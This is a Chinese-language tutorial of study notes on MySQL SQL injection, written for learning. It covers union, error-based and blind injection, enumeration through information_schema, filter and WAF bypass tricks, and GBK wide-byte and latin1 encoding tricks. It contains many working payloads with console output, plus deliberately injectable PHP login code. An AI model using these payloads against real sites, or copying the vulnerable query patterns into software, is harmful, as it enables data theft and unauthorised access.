sql注入篇

前言

sql注入的知识学习总结

0x01 基础知识

……

0x02 查

1.有回显
对于一个web应用来说就是当我们根据某个字段查询数据时,该字段查询返回的结果显示在页面中;对于数据库来说就是查询的u_id(自己定义的一个字段)这样一个字段返回的结果,例如:
1
2
3
4
5
6
7
mysql> select username,password from users where u_id='4411';
+----------+----------+
| username | password |
+----------+----------+
| user1 | 123 |
+----------+----------+
1 row in set (0.00 sec)
对于上面的回显我们一般用union+select的组合来进行注入,例如:
1
2
3
4
5
6
7
8
mysql> select username,password from users where u_id='4411' union select user(),database();
+----------------+-----------+
| username | password |
+----------------+-----------+
| user1 | 123 |
| root@localhost | shopping1 |
+----------------+-----------+
2 rows in set (0.00 sec)
PS 注意:
  • 若回显只能是一条数据,那么我们需要让前面的正常查询的结果为空(或者用limit x,x来选出我们需要的数据返回)。
  • 当使用union select进行拼接查询时,我们需要让前后两个select语句返回的字段数相同,否则会执行错误。
2.无回显
示例代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
$servername="127.0.0.1";
$username="root";
$password="ljdd520";
$dbname="shopping1";

$conn = mysqli_connect($servername, $username, $password, $dbname);
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
$username = @$_POST['username'];
$password = @$_POST['password'];
$sql = "select * from users where username = '$username' and password='$password';";
$rs = mysqli_query($conn,$sql);
if($rs->fetch_row()){
echo "success";
}else{
echo "fail";
}
?>
对于一个web应用来说就是当sql语句执行成功时返回一个标志,执行失败时返回另一个标志(例如:上面的代码模拟了一个应用的登陆处理,成功时返回success,失败时返回fail),但是这个返回的标志不是sql语句执行的结果,通常遇到这种无回显的注入我们用报错注入和盲注
报错注入
报错注入就是有些函数会将其参数的结果包含在其报错信息中,通常我们利用这一个特性在其参数中放入我们想要得到的数据,一般使用子查询的方式实现,然后使其报错得到信息,例如:
1
2
3
4
5
mysql> select username,password from users where u_id='4411' and updatexml(1,concat(0x7e,(select user()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'

mysql> select username,password from users where u_id='4411' and exp(~(select*from(select user())x));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select `x`.`user()` from (select user() AS `user()`) `x`)))'
上面的exp没有报错出我们user()的数据可能是我mysql的原因(我的版本mysql-8.0.18)。
盲注
如果web应用设置了不能纰漏报错的数据,而且不能直接返回sql的执行结果,那么盲注就成了唯一的选择,盲注也有两种方式时间盲注bool盲注
bool盲注
名如其曰就是通过对真假条件的判断(真假条件返回的内容要容易区分)来进行注入的方式。
例如,我们正常的sql语句是select username,password from users where u_id='4411';,我们都知道where的后面是条件那么我们在加一个条件对比一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
mysql> select username,password from users where u_id='4411';
+----------+----------+
| username | password |
+----------+----------+
| user1 | 123 |
+----------+----------+
1 row in set (0.00 sec)

mysql> select username,password from users where u_id='4411' and 1=2;
Empty set (0.00 sec)

mysql> select username,password from users where u_id='4411' and 1=1;
+----------+----------+
| username | password |
+----------+----------+
| user1 | 123 |
+----------+----------+
1 row in set (0.00 sec)
可以看到当where后面的条件为时,返回的结果空,如果真假条件返回的内容在页面上容易区分的话我们可以使用bool盲注
例句:(where | and | or| || | && | ^) if(substr((select password from users where username='admin'),1,1)='a',1,0)(^1 | ^0);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
mysql> select username,password from users where u_id='4411' and if(substr((select password from users where username='admin'),1,1)='1',1,0);
Empty set (0.00 sec)

mysql> select username,password from users where u_id='4411' and if(substr((select password from users where username='admin'),1,1)='2',1,0);
+----------+----------+
| username | password |
+----------+----------+
| user1 | 123 |
+----------+----------+
1 row in set (0.00 sec)

mysql> select *from users;
+------+----------+----------------------------------+-------+------------+---------+
| u_id | username | password | phone | email | address |
+------+----------+----------------------------------+-------+------------+---------+
| 4411 | user1 | 123 | 124 | 123@qq.com | 123 |
| 4412 | user2 | 456 | 568 | 456@qq.com | 456 |
| 4413 | admin | 21232f297a57a5a743894a0e4a801fc3 | 789 | 789@qq.com | 789 |
+------+----------+----------------------------------+-------+------------+---------+
3 rows in set (0.00 sec)

mysql> select username,password from users where u_id='4411'^if(substr((select password from users where username='admin'),1,1)='1',1,0)^1;
Empty set (0.00 sec)

mysql> select username,password from users where u_id='4411'^if(substr((select password from users where username='admin'),1,1)='2',1,0)^1;
+----------+----------+
| username | password |
+----------+----------+
| user1 | 123 |
+----------+----------+
1 row in set (0.00 sec)
时间盲注
对于时间盲注而言是通过页面返回的延迟的时间来判断条件是否正确。简单来说就是我们自定义的条件为假的时候,我们设置延迟时间为0,如果条件为真,使用benchmarksleep等函数,让sql语句执行产生延迟,例如:
1
2
3
4
5
6
7
8
9
10
mysql> select username,password from users where u_id='4413' and if(0,sleep(3),1);
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 |
+----------+----------------------------------+
1 row in set (0.00 sec)

mysql> select username,password from users where u_id='4413' and if(1,sleep(3),1);
Empty set (3.00 sec)
例句:(and | other) if(substr((select password from users where username='admin'),1,1)='a',sleep(3),1);
小结:
常见注入方法有三种:联合查询注入,报错注入,盲注,其中:
  • 有回显:三种均可用,推荐使用联合查询注入。
  • 无回显:报错注入+盲注
对于时间成本来说:联合查询注入<报错注入<<盲注。
通常情况下,盲注需要一个一个字符的进行判断。这极大的增加了时间成本,况且对于时间盲注来说,还需要额外的延迟时间来作为判断的标准。
3.三大注入的基本步骤
联合查询注入步骤
1)首先,先确定字段数量。
使用order/group by语句。通过往后拼接数字,可确定字段数量,若拼接字段数大于原字段数,则页面错误/无内容,若拼接的字段数小于/等于,则页面正常。若错误页与正常页一样,更换报错注入/盲注,例如:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
mysql> select username,password from users where u_id='4413' order by 1,2;
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 |
+----------+----------------------------------+
1 row in set (0.00 sec)

mysql> select username,password from users where u_id='4413' order by 1;
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 |
+----------+----------------------------------+
1 row in set (0.00 sec)

mysql> select username,password from users where u_id='4413' order by 1,2,3;
ERROR 1054 (42S22): Unknown column '3' in 'order clause'
2)第二步,判断页面回显数据的字段位置。
使用and union select 1,2,3,4,x...我们定义的数字将显示在页面上,即可从中判断页面显示的字段位置。
注意:
  • 若确定页面有回显,但是页面中并没有我们定义的特殊标记数字出现,可能是页面现在了单行数据输出,我们让前边的select查询条件返回结果为空即可。
  • 注意一定要拼接够足够的字段数,否则SQL语句报错。PS:此方法也可作为判断前条select语句的方法之一。
3) 第三步,在显示的字段位置使用子查询来查询数据,或直接查询也可。
首先,查询当前数据库名database()、数据库账号user()、数据库版本version()等基本情况,再根据不同的版本、不同的权限确定接下来的方法。
若Mysql版本<5.0
简单的说,由于mysql的低版本缺乏系统库information_schema,故通常情况下,我们无法直接查询表名,字段(列)名等信息,这时候只能靠猜来解决。
直接猜表名与列名是什么,甚至是库名,再使用联合查询取数据。
若知道仅表名而不知道列(字段)名:
可通过以下payload:
  • 若多字段:select x from(select 1,2,3,4,xxx from table_name union select * from table_name)a
  • 若单字段:select *,1,2,xxx from table_name
若Mysql版本>=5.0
首先去一个名为information_schema的数据库里的shemata数据表查询全部数据库名。
若不需要跨数据库的话,可直接跳过此步骤,直接查询相应的数据库下的全部数据表名。
information_schema的一个名为tables的数据表中存着全部的数据表信息。
其中,table_name字段保存其名称,table_schema保存其对应的数据库名。
示例如下:
1
2
3
4
5
6
7
8
mysql> select username,password,phone from users where u_id='4413' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();
+----------+----------------------------------+--------------------------------------------------------------------------+
| username | password | phone |
+----------+----------------------------------+--------------------------------------------------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 | 789 |
| 1 | 2 | admin,cart,orderp,orders,product_sku,product_spu,product_type,test,users |
+----------+----------------------------------+--------------------------------------------------------------------------+
2 rows in set (0.00 sec)
上述payload可查看全部的数据表名,其中group_concat函数将多行数据转成一行数据。
接着通过其表名,查询该表的所有字段名,有时也称列名。
通过information_schema库下的columns表可查询对应的数据库/数据库表含有的字段名。
示例如下:
1
select username,password,phone from users where u_id='4413' union select 1,2,group_concat(table_name) from information_schema.columns where table_schema=database() and table_name=(table_name); #此处的表名为字符串型,也通过十六进制表示
知道了想要的数据存放的数据库,数据表,直接联合查询,payload如下:
1
and union select 1,2,column_name,4,xxx from (database_name.)table_name
例如:
1
2
3
4
5
6
7
8
9
10
mysql> select username,password,phone from users where u_id='4413' union select 1,2,password from shopping1.users;
+----------+----------------------------------+----------------------------------+
| username | password | phone |
+----------+----------------------------------+----------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 | 789 |
| 1 | 2 | 123 |
| 1 | 2 | 456 |
| 1 | 2 | 21232f297a57a5a743894a0e4a801fc3 |
+----------+----------------------------------+----------------------------------+
4 rows in set (0.00 sec)
简单的说就是,查库名->查表名->查字段名->查数据
4.盲注步骤
核心:利用逻辑代数连接词/条件函数,让页面返回的内容/响应时间与正常的页面不符。
bool盲注
首先通过页面对于永真条件or 1=1与永假条件and 1=2的返回内容是否存在差异进行判断是否可以进行布尔盲注。
如:select * from users where username=$username,其作用设定为判断用户名是否存在。
通常仅返回存在/不存在,两个结果。
这时候我们就不能使用联合查询法注入,因为页面不显示SQL语句返回的内容,只能使用盲注法/报错注入法来注出数据。
我们在将语句注入成:select * from users where username=$username or (condition)
若后边拼接的条件为真的话,那么整条语句的where区域将变成永真条件。
那么,即使我们在$username处输入的用户名为一个铁定不存在的用户名,那么返回的结果也仍然为存在。
利用这一特性,我们的condition为:length(database())>8 即可用于判断数据库名长度
除此之外,还可:ascii(substr(database(),1,1))<130 用二分法快速获取数据名(逐字判断)
payload如下:
1
2
select * from users where username=nouser or length(database())>8
select * from users where username=nouser or ascii(substr(database(),1,1))<130
示例:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
mysql> select username,password,phone from users where username='nouser' or ascii(substr(database(),1,1))>114;
+----------+----------------------------------+-------+
| username | password | phone |
+----------+----------------------------------+-------+
| user1 | 123 | 124 |
| user2 | 456 | 568 |
| admin | 21232f297a57a5a743894a0e4a801fc3 | 789 |
+----------+----------------------------------+-------+
3 rows in set (0.00 sec)

mysql> select username,password,phone from users where username='nouser' or length(database())>8;
+----------+----------------------------------+-------+
| username | password | phone |
+----------+----------------------------------+-------+
| user1 | 123 | 124 |
| user2 | 456 | 568 |
| admin | 21232f297a57a5a743894a0e4a801fc3 | 789 |
+----------+----------------------------------+-------+
3 rows in set (0.00 sec)

mysql> select username,password,phone from users where username='nouser' or ascii(substr(database(),1,1))>116;
Empty set (0.00 sec)

mysql> select username,password,phone from users where username='nouser' or length(database())>10;
Empty set (0.00 sec)
时间盲注
通过判断页面返回内容的响应时间差异进行条件判断。
通常可利用的产生时间延迟的函数有:sleep()benchmark(),还有许多进行复杂运算的函数也可以当做延迟的判断标准、笛卡尔积合并数据表、GET_LOCK双SESSION产生延迟等方法。
如上述例子:若服务器在执行永真/永假条件并不直接返回两个容易区分的内容时,利用时间盲注或许是个更好的办法。
在上述语句中,我们拼接语句,变成:
1
select * from users where username=$username (and | or) if(length(database())>8,sleep(3),1)
例如:
1
2
3
4
5
6
7
8
9
10
mysql> select username,password from users where u_id='4413' and if(length(database())>8,sleep(3),1);
Empty set (3.01 sec)

mysql> select username,password from users where u_id='4413' and if(length(database())>10,sleep(3),1);
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 |
+----------+----------------------------------+
1 row in set (0.00 sec)
如果数据库名的长度大于8,那么if条件将执行sleep(3),那么此条语句将进行延迟3秒的操作。
若小于或等于8,则if条件直接返回1,并与前边的逻辑连接词拼接,无延迟直接返回。通常的响应时间在0-1秒之内,与上种情况具有很容易区分的结果,可做条件判断的依据。
5.报错注入步骤
通过特殊函数的错误使用使其参数被页面输出。
前提:服务器开启报错信息返回,也就是发生错误时返回报错信息。
常见的利用函数有:exp()、floor()+rand()、updatexml()、extractvalue()
如:select * from users where username=$username (and | or) updatexml(1,concat(0x7e,(select user()),0x7e),1)
示例:
1
2
mysql> select username,password from users where u_id='4413' and updatexml(1,concat(0x7e,(select user()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
因为updatexml函数的第二个参数需要满足xpath格式,我们在其前后添加字符~,使其不满足xpath格式,进行报错并输出。
将上述payload的(select user())当做联合查询法的注入位置,接下来的操作与联合查询法一样。
注意:
  • 报错函数通常尤其最长报错输出的限制,面对这种情况,可以进行分割输出。
  • 特殊函数的特殊参数进运行一个字段、一行数据的返回,使用group_concat等函数聚合数据即可。

0x03.增、删、改

可简单当做无回显的Select语句进行注入。值得注意的是,通常增insert处的注入点在测试时会产生大量的垃圾数据,删delete处的注入千万要注意where条件不要为永真。

Mysql注入-进阶

0x04.常见的防御手段绕过

在讲绕过之前,我认为有必要先讲讲什么是:过滤与拦截。
简单的说就是:过滤指的是,我们输入的部分内容在拼接SQL语句之前被程序删除掉了,接着将过滤之后的内容拼接到SQL语句并继续与数据库通信。而拦截指的是:若检测到指定的内容存在,则直接返回拦截页面,同时不会进行拼接SQL语句并与数据库通信的操作。
若程序设置的是过滤,则若过滤的字符不为单字符,则可以使用双写绕过。
举个例子:程序过滤掉了union这一关键词,我们可以使用ununionion来绕过。
PS:一般检测方法都是利用的正则,注意观察正则匹配时,是否忽略大小写匹配,若不忽略,直接使用大小写混搭即可绕过。
2.and/or 被过滤/拦截
  • 双写anandd、oorr
  • 使用运算符代替&&、||
  • 直接拼接=号,如:?id=1=(condition)
  • 其他方法,如:?id=1^(condition)
3.空格被过滤/拦截
  • 多层括号嵌套
  • 改用+号
  • 使用注释代替
  • and/or后面可以跟上偶数个!、~可以替代空格,也可以混合使用(规律又不同),and/or前的空格可用省略
  • %09, %0a, %0b, %0c, %0d, %a0等部分不可见字符可也代替空格
如:select * from user where username='admin'union(select+title,content/**/from/*!article*/where/**/id='1'and!!!!~~1=1)
例如:
1
2
3
4
5
6
7
8
mysql> select username,password from users where u_id='4413'union(select+username,password/**/from/*!users*/where/**/u_id='4412'and!!!!~~1=1);
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 |
| user2 | 456 |
+----------+----------------------------------+
2 rows in set, 2 warnings (0.00 sec)
4.括号被过滤/拦截
  • order by 大小比较盲注
    1)利用场景
    登录代码:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    <?php
    $username = $_POST['username'];
    $password = $_POST['password'];
    if(filter($username)){
    //过滤括号
    }else{
    $sql="SELECT * FROM admin WHERE username='".$username."'";
    $result=mysql_query($sql);
    @$row = mysql_fetch_array($result);
    if(isset($row) && $row['username'] === 'admin'){
    if ($row['password']===md5($password)){
    //Login successful
    }else{
    die("password error!");
    }
    }else{
    die("username does not exist!");
    }
    }
有下列表:
1
2
3
4
5
6
7
mysql> select * from admin where username='admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
这样一个一般的场景,用户登录时,用户名错误提示:用户名错误,用户名正确密码错误提示:密码错误
2)UNION SELECT登录
看到这个逻辑第一想法肯定是直接利用union select伪造密码登录:username=' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b&password=1
1
2
3
4
5
6
7
mysql> select * from admin where username='' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | c4ca4238a0b923820dcc509a6f75849b |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
但是想得到password怎么办?
3)利用order by进行盲注

由登录提示可获取一个bool条件,如何用order by利用这个bool条件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | 2 | 5 |
| 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 |
| 1 | 2 | 6 |
+----+----------+----------------------------------+
2 rows in set (0.01 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'51' order by 3;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | 2 | 51 |
| 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'52' order by 3;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 51b7a76d51e70b419f60d3473fb6f900 |
| 1 | 2 | 52 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)
通过逐位判断便可得到password
显然此方法在实际中使用的不多,但在一些特定的环境中也许会用到,比如实验环境,如果过滤了括号,其他盲注基本上就是废了,便可利用order by进行注入。
5.逗号被过滤/拦截
1).改用盲注
2).使用join语句代替
3).substr(data from 1 for 1)相当于substr(data,1,1)limit 9 offset 4相当于limt 9,4
例如:
1
2
3
4
5
6
7
8
9
10
mysql> select username,password from users where u_id='4413' and ascii(substr((select user()) from 1 for 1))>114;
Empty set (0.00 sec)

mysql> select username,password from users where u_id='4413' and ascii(substr((select user()) from 1 for 1))>113;
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 |
+----------+----------------------------------+
1 row in set (0.00 sec)
6.其他系统关键字被过滤/拦截
1).双写绕过关键字过滤
2).使用同义函数/语句代替,如if函数可用case when condition then 1 else 0 end语句代替。
7.单双引号被过滤/拦截/转义
1).需要跳出单引号的情况:尝试是否存在编码问题而产生的SQL注入。
2).不需要跳出单引号的情况:字符串可用十六进制表示、也可通过进制转换函数表示成其他进制。
3).数字被过滤/拦截
下表摘自MySQL注入技巧
代替字符 数,字
false、!pi() 0
true、!(!pi()) 1
true+true 2
floor(pi())、~~pi() 3
ceil(pi()) 4
floor(version()) //注意版本 5
ceil(version()) 6
ceil(pi()+pi()) 7
floor(version()+pi()) 8
floor(pi()*pi()) 9
ceil(pi()*pi()) 10 A
ceil(pi()*pi())+true 11 B
ceil(pi()+pi()+version()) 12 C
floor(pi()*pi()+pi()) 13 D
ceil(pi()*pi()+pi()) 14 E
ceil(pi()*pi()+version()) 15 F
floor(pi()*version()) 16 G
ceil(pi()*version()) 17 H
ceil(pi()*version())+true 18 I
floor((pi()+pi())*pi()) 19 J
ceil((pi()+pi())*pi()) 20 K
ceil(ceil(pi())*version()) 21 L
ceil(pi()*ceil(pi()+pi())) 22 M
ceil((pi()+ceil(pi()))*pi()) 23 N
ceil(pi())*ceil(version()) 24 O
floor(pi()*(version()+pi())) 25 P
floor(version()*version()) 26 Q
ceil(version()*version()) 27 R
ceil(pi()pi()pi()-pi()) 28 S
floor(pi()pi()floor(pi())) 29 T

0x05.编码转换产生的问题

1.宽字节注入
什么是宽字节注入?下面举个例子来告诉你。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
$conn = mysqli_connect("127.0.0.1:3306", "root", "ljdd520", "shopping1");
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
$conn->query("set names 'gbk';");
$username = addslashes(@$_POST['username']);
$password = addslashes(@$_POST['password']);
$sql = "select * from users where username = '$username' and password='$password';";
$rs = mysqli_query($conn,$sql);
echo $sql.'<br>';
if($rs->fetch_row()){
echo "success";
}else{
echo "fail";
}
?>
该例子与开头的很相似,只不过改变三行。
1
2
3
$conn->query("set names 'gbk';");
$username = addslashes(@$_POST['username']);
$password = addslashes(@$_POST['password']);
addslashes函数将会把POST接收到的username与password的部分字符进行转义处理。如下:
  • 字符'、"、\前边会被添加上一条反斜杠\作为转义字符。
  • 多个空格被过滤成一个空格。
    这使得我们原本的payload被转义成如下:
    1
    select * from users where username = 'admin\'#' and password='123';
注意:我们输入的单引号被转义掉了,此时SQL语句的功能是:查找用户名为admin'#且密码为123的用户。
但是我们注意到,在拼接SQL语句并与数据库进行通信之前,我们执行了这么一条语句:
1
$conn->query("set names 'gbk';");
其作用相当于:
1
2
3
mysql>SET character_set_client ='gbk';
mysql>SET character_set_results ='gbk';
mysql>SET character_set_connection ='gbk';
当我们输入的数据为:username=%df%27or%201=1%23&password=123
经过addslashes函数处理最终变成:username=%df%5c%27or%201=1%23&password=123
经过gbk解码得到:username=運'or 1=1#password=123,拼接到SQL语句得:
1
select * from users where username = '運'or 1=1#' and password='123';
成功跳出了addslashes的转义限制。
具体解释
前边提到:set names 'gbk';相当于执行了如下操作:
1
2
3
mysql>SET character_set_client ='gbk';
mysql>SET character_set_results ='gbk';
mysql>SET character_set_connection ='gbk';
那么此时在SQL语句在与数据库进行通信时,会先将SQL语句进行对应的character_set_client所设置的编码进行转码,本例是gbk编码。
由于PHP的编码为UTF-8,我们输入的内容为%df%27,会被当做是两个字符,其中%27为单引号'
经过函数addslashes处理变成%df%5c%27%5c为反斜线\
在经过客户端层character_set_client编码处理后变成:運',成功将反斜线给“吞”掉了,使单引号逃逸出来。
2.Latin1默认编码
接下来我们就讲一讲latin1造成的编码问题。
例如:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
$mysqli = new mysqli("localhost", "root", "root", "ljdd520");

/* check connection */
if ($mysqli->connect_errno) {
printf("Connect failed: %s\n", $mysqli->connect_error);
exit();
}

$mysqli->query("set names utf8");

$username = addslashes($_GET['username']);

//我们在其基础上添加这么一条语句。
if($username === 'admin'){
die("You can't do this.");
}

/* Select queries return a resultset */
$sql = "SELECT * FROM `table1` WHERE username='{$username}'";

if ($result = $mysqli->query( $sql )) {
printf("Select returned %d rows.\n", $result->num_rows);

while ($row = $result->fetch_array(MYSQLI_ASSOC))
{
var_dump($row);
}

/* free result set */
$result->close();
} else {
var_dump($mysqli->error);
}

$mysqli->close();
?>
建表语句如下:
1
2
3
4
5
6
CREATE TABLE `table1` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`username` varchar(255) COLLATE latin1_general_ci NOT NULL,
`password` varchar(255) COLLATE latin1_general_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=latin1 COLLATE=latin1_general_ci;
我们设置表的编码为latin1,事实上,就算你不填写,默认编码便是latin1。
我们往表中添加一条数据:insert table1 VALUES(1,'admin','admin');
注意查看源代码:
1
2
3
if($username === 'admin'){
die("You can't do this.");
}
我们对用户的输入进行了判断,若输入内容为admin,直接结束代码输出返回,并且还对输入的内容进行addslashes处理,使得我们无法逃逸出单引号。
这样的话,我们该怎样绕过这个限制,让页面输出admin的数据呢?
我们注意到:$mysqli->query("set names utf8");这么一行代码,在连接到数据库之后,执行了这么一条SQL语句。
上边在gbk宽字节注入的时候讲到过:set names utf8;相当于:
1
2
3
mysql>SET character_set_client ='utf8';
mysql>SET character_set_results ='utf8';
mysql>SET character_set_connection ='utf8';
前边说道:PHP的编码是UTF-8,而我们现在设置的也是UTF-8,怎么会产生问题呢?
前边我们提到:SQL语句会先转成character_set_client设置的编码。但,他接下来还会继续转换。character_set_client客户端层转换完毕之后,数据将会交给character_set_connection连接层处理,最后在从character_set_connection转到数据表的内部操作字符集。
来本例中,字符集的转换为:UTF-8—>UTF-8->Latin1
这里需要讲一下UTF-8编码的一些内容。
UTF-8编码是变长编码,可能有1~4个字节表示:
一字节时范围是[00-7F]
两字节时范围是[C0-DF][80-BF]
三字节时范围是[E0-EF][80-BF][80-BF]
四字节时范围是[F0-F7][80-BF][80-BF][80-BF]
然后根据RFC 3629规范,又有一些字节值是不允许出现在UTF-8编码中的:

所以最终,UTF-8第一字节的取值范围是:00-7F、C2-F4。
关于所有的UTF-8字符,你可以在这个表中一一看到:http://utf8-chartable.de/unicode-utf8-table.pl
引自:Mysql字符编码利用技巧
利用这一特性,我们输入:?username=admin%c2%c2是一个Latin1字符集不存在的字符。
由上述,可以简单的知道:%00-%7F可以直接表示某个字符、%C2-%F4不可以直接表示某个字符,他们只是其他长字节编码结果的首字节。
但是,这里还有一个Trick:Mysql所使用的UTF-8编码是阉割版的,仅支持三个字节的编码。所以说,Mysql中的UTF-8字符集只有最大三字节的字符,首字节范围:00-7F、C2-EF
而对于不完整的长字节UTF-8编码的字符,若进行字符集转换时,会直接进行忽略处理。
利用这一特性,我们的payload为?username=admin%c2,此处的%c2换为%c2-%ef均可。
1
SELECT * FROM `table1` WHERE username='admin'
因为admin%c2在最后一层的内部操作字符集转换中变成admin

0x06.报错注入原理

我们前边说到,报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。
那么,我们具体来说说,都有哪些特殊函数,以及他们都该怎么使用。
MySQL的报错注入主要是利用MySQL的一些逻辑漏洞,如BigInt大数溢出等,由此可以将MySQL报错注入分为以下几类:
  • BigInt等数据类型溢出
  • 函数参数格式错误
  • 主键/字段重复
1.exp()
函数语法:exp(int)
适用版本:5.5.5~5.5.49
该函数将会返回e的x次方结果,例如:
1
2
3
4
5
6
7
mysql> select exp(3);
+--------------------+
| exp(3) |
+--------------------+
| 20.085536923187668 |
+--------------------+
1 row in set (0.01 sec)
为什么会报错呢?我们知道,次方到后边每增加1,其结果都将跨度极大,而mysql能记录的double数值范围有限,一旦结果超过范围,则该函数报错。例如:
1
2
mysql> select exp(1000);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(1000)'
我们的payload为:exp(~(select * from(select user())a))
其中,~符号为运算符,意思为一元字符反转,通常将字符串经过处理后变成大整数,再放到exp函数内,得到的结果将超过mysql的double数组范围,从而报错输出。
除了exp()之外,还有类似pow()之类的相似函数同样是可利用的,他们的原理相同。
2.updatexml()
函数语法:updatexml(XML_document, XPath_string, new_value);
适用版本: 5.1.5+
我们通常在第二个xpath参数填写我们要查询的内容。
与exp()不同,updatexml是由于参数的格式不正确而产生的错误,同样也会返回参数的信息。
payload: updatexml(1,concat(0x7e,(select user()),0x7e),1)
前后添加~(0x7e)使其不符合xpath格式从而报错。例如:
1
2
mysql> select updatexml(1,concat(0x7e,(select user()),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
3.extractvalue()
函数语法:EXTRACTVALUE (XML_document, XPath_string);
适用版本:5.1.5+
利用原理与updatexml函数相同
payload: and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
例如:
1
2
mysql> select (extractvalue(1,concat(0x7e,(select user()),0x7e)));
ERROR 1105 (HY000): XPATH syntax error: '~root@localhost~'
4.rand()+group()+count()
虚拟表报错原理:简单来说,是由于where条件每执行一次,rand函数就会执行一次,如果在由于在统计数据时判断依据不能动态改变,故rand()不能后接在order/group by上。
举一个例子:假设user表有三条数据,我们通过:select * from user group by username来通过其中的username字段进行分组。
此过程会先建立一个虚拟表,存在两个字段:key,count
其中我们通过username来判断,其在此处是字段,首先先取第一行的数据:username=test&password=test
username为test出现一次,则现在虚表内查询是否存在test,若存在,则count+1,若不存在,则添加test,其count为1。
对于floor(rand(0)*2),其中rand()函数,会生成0~1之间随机一个小数、floor()取整数部分、0是随机因子、乘2是为了让大于0.5的小数通过floor函数得1,否则永远为0。
若表中有三行数据:我们通过select * from user group by floor(rand(0)*2)进行排序的话。
注意,由于rand(0)的随机因子是被固定的,故其产生的随机数也被固定了,顺序为:011011…
首先group by需要执行的话,需要确定分组因子,故floor(rand(0)*2)被执行一次,得到的结果为0,接着在虚表内检索0,发现虚表没有键值为0的记录,故添加上,在进行添加时:floor(rand(0)*2)第二次被执行,得到结果1,故虚表插入的内容为key=1&count=1
第二次执行group by时:floor(rand(0)*2)先被运行一次,也就是第三次运行。得到结果1,查询虚表发现数据存在,因而直接让虚表内的key=1的count加一即可,floor(..)只运行了一次。
第三次执行group by时,floor被执行第四次,得到结果0,查询虚表不存在。再插入虚表时,floor(…)被执行第五次,得到结果1,故此时虚表将插入的值为key=1&count=1,注意,此时虚表已有一条记录为:key=1&count=2,并且字段key为主键,具有不可重复性,故虚表在尝试插入时将产生错误。
图文如下:
1.查询前默认会建立空虚拟表如下图:

2.取第一条记录,执行floor(rand(0)2),发现结果为0(第一次计算),查询虚拟表,发现0的键值不存在,则floor(rand(0)2)会被再计算一次,结果为1(第二次计算),插入虚表,这时第一条记录查询完毕,如下图:

3.查询第二条记录,再次计算floor(rand(0)2),发现结果为1(第三次计算),查询虚表,发现1的键值存在,所以floor(rand(0)2)不会被计算第二次,直接count(*)加1,第二条记录查询完毕,结果如下:

4.查询第三条记录,再次计算floor(rand(0)2),发现结果为0(第4次计算),查询虚表,发现键值没有0,则数据库尝试插入一条新的数据,在插入数据时floor(rand(0)2)被再次计算,作为虚表的主键,其值为1(第5次计算),然而1这个主键已经存在于虚拟表中,而新计算的值也为1(主键键值必须唯一),所以插入的时候就直接报错了。
5.整个查询过程floor(rand(0)*2)被计算了5次,查询原数据表3次,所以这就是为什么数据表中需要3条数据,使用该语句才会报错的原因。
